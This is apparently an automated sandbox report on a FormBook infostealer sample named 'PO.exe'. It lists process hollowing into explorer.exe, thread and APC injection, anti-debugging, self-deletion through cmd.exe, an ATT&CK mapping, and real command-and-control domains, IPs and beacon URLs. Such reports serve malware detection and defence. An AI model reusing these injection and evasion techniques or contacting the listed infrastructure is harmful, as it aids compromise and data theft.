Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]	10_2_04CCAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]	10_2_04CCAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]	10_2_04CCAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB8A0A mov eax, dword ptr fs:[00000030h]	10_2_04CB8A0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]	10_2_04CAC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]	10_2_04CAC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAC600 mov eax, dword ptr fs:[00000030h]	10_2_04CAC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD8E00 mov eax, dword ptr fs:[00000030h]	10_2_04CD8E00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC3A1C mov eax, dword ptr fs:[00000030h]	10_2_04CC3A1C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]	10_2_04CDA61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDA61C mov eax, dword ptr fs:[00000030h]	10_2_04CDA61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]	10_2_04CA5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA5210 mov ecx, dword ptr fs:[00000030h]	10_2_04CA5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]	10_2_04CA5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA5210 mov eax, dword ptr fs:[00000030h]	10_2_04CA5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]	10_2_04CAAA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAAA16 mov eax, dword ptr fs:[00000030h]	10_2_04CAAA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61608 mov eax, dword ptr fs:[00000030h]	10_2_04D61608
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]	10_2_04CE4A2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE4A2C mov eax, dword ptr fs:[00000030h]	10_2_04CE4A2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D5FE3F mov eax, dword ptr fs:[00000030h]	10_2_04D5FE3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAE620 mov eax, dword ptr fs:[00000030h]	10_2_04CAE620
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]	10_2_04D253CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D253CA mov eax, dword ptr fs:[00000030h]	10_2_04D253CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCDBE9 mov eax, dword ptr fs:[00000030h]	10_2_04CCDBE9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD03E2 mov eax, dword ptr fs:[00000030h]	10_2_04CD03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE37F5 mov eax, dword ptr fs:[00000030h]	10_2_04CE37F5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]	10_2_04CB1B8F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB1B8F mov eax, dword ptr fs:[00000030h]	10_2_04CB1B8F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]	10_2_04D27794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]	10_2_04D27794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27794 mov eax, dword ptr fs:[00000030h]	10_2_04D27794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D5D380 mov ecx, dword ptr fs:[00000030h]	10_2_04D5D380
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2397 mov eax, dword ptr fs:[00000030h]	10_2_04CD2397
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D6138A mov eax, dword ptr fs:[00000030h]	10_2_04D6138A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDB390 mov eax, dword ptr fs:[00000030h]	10_2_04CDB390
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB8794 mov eax, dword ptr fs:[00000030h]	10_2_04CB8794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]	10_2_04CD4BAD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]	10_2_04CD4BAD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4BAD mov eax, dword ptr fs:[00000030h]	10_2_04CD4BAD

Source: C:\Users\user\Desktop\PO.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.cwyxonlp.icu
Source: C:\Windows\explorer.exe	Domain query: www.phorice.com
Source: C:\Windows\explorer.exe	Domain query: www.websiteworlda-z.com
Source: C:\Windows\explorer.exe	Network Connect: 44.227.76.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 194.117.254.63 80	Jump to behavior

Contains functionality to prevent local Windows debugging

Show sources

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,

0_2_73351000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PO.exe	Section loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\PO.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 900000

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'			Jump to behavior

Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.511285209.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000003.00000002.497174313.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.498099374.0000000001640000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000002.500716588.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery241	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection612	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing11	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO.exe	17%	ReversingLabs	Win32.Spyware.Noon

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll	10%	ReversingLabs	Win32.PUA.Wacapew

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.explorer.exe.51af834.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.PO.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.explorer.exe.900000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.PO.exe.2670000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.1.PO.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.PO.exe.28b0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
www.c-voyageinc.com/r4ei/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://phorice.com	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.websiteworlda-z.com	194.117.254.63	true	true	unknown
pixie.porkbun.com	44.227.76.166	true	false	high
www.cwyxonlp.icu	unknown	unknown	true	unknown
www.phorice.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.c-voyageinc.com/r4ei/	true	Avira URL Cloud: safe	low
http://www.phorice.com/r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f	true	Avira URL Cloud: safe	unknown
http://www.websiteworlda-z.com/r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://phorice.com	explorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.117.254.63	www.websiteworlda-z.com	Germany		199753	UDMEDIA-ASDE	true
44.227.76.166	pixie.porkbun.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383905
Start date:	08.04.2021
Start time:	12:07:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/3@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.5% (good quality ratio 22.1%) Quality average: 74.4% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 89% Number of executed functions: 99 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.193.48, 95.100.54.203, 104.43.139.144, 13.64.90.137 Excluded domains from analysis (whitelisted): www.bing.com, skypedataprdcolwus17.cloudapp.net, cs9.wac.phicdn.net, fs.microsoft.com, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net VT rate limit hit for: /opt/package/joesandbox/database/analysis/383905/sample/PO.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
44.227.76.166	comprobante de pago bancario.exe	Get hash	malicious	Browse	www.yogatrac.com/nyd/?YtuHyXfh=SMnWtEQ8y2pX2v0EcX/kTDaCTyMd/4ZOM8Yn20hDsleGVYNoHo8paRPAMQl4LEXOAbPhqadgrw==&EZXXgv=jfFxzRS8f
	DHL Shipping Documents.exe	Get hash	malicious	Browse	www.moxie.tools/iuem/?FPWh=qnqwh/4dGUkEPIiKKZC2Qh7/64Y57CPLqiaIJV/+rJe3odMWgDf37HnBEyhQfLRblvKe&a48=tXIxBt1HyrBHz
	Qag2QPPlqt.dll	Get hash	malicious	Browse	deregojikulo.uno/
	proposal.xlsm	Get hash	malicious	Browse	www.presetleb.com/c2m8/?Cp=mL3ph6&9rH8-46=B8KyvHV7cHq72Oa5QjcCq/2rFyb4yB/qHh31zSj+jHa+8ZyD95jL+K6sl8yH++EKbvdp
	ezr37taArt.exe	Get hash	malicious	Browse	www.miraterratravel.com/ea9e/?GV_T=kpyYxkk9Ceh68GTku2FXTga5fFtWFfAJreHIHrkcWtIc/mW0Yt08earvdHXP/oWhsQVrL3JPMw==&AnB=O2Mx8TLHW
	Soa.doc	Get hash	malicious	Browse	www.jel-tv365.com/bf3/?ObUhgbrX=pPFC1+5LH0IKJOgFl43N69YXWFusdtxU8P9UDIzNNR9l6bY12tLu7UJOSlu1hZVFy9DQOw==&bxl8=Z488bf3h1DuDA8F
	SCAN_20210112_132640143,pdf.exe	Get hash	malicious	Browse	www.pizzony.com/rmck/?Bf=7fOJYc3SWWcK9ItFVlvmlups7o9AcKVpiUJzUCYg5a838kgteGFS+Jc7xrCS57SKg0rr&rv0PXN=hBZtPr80A0f
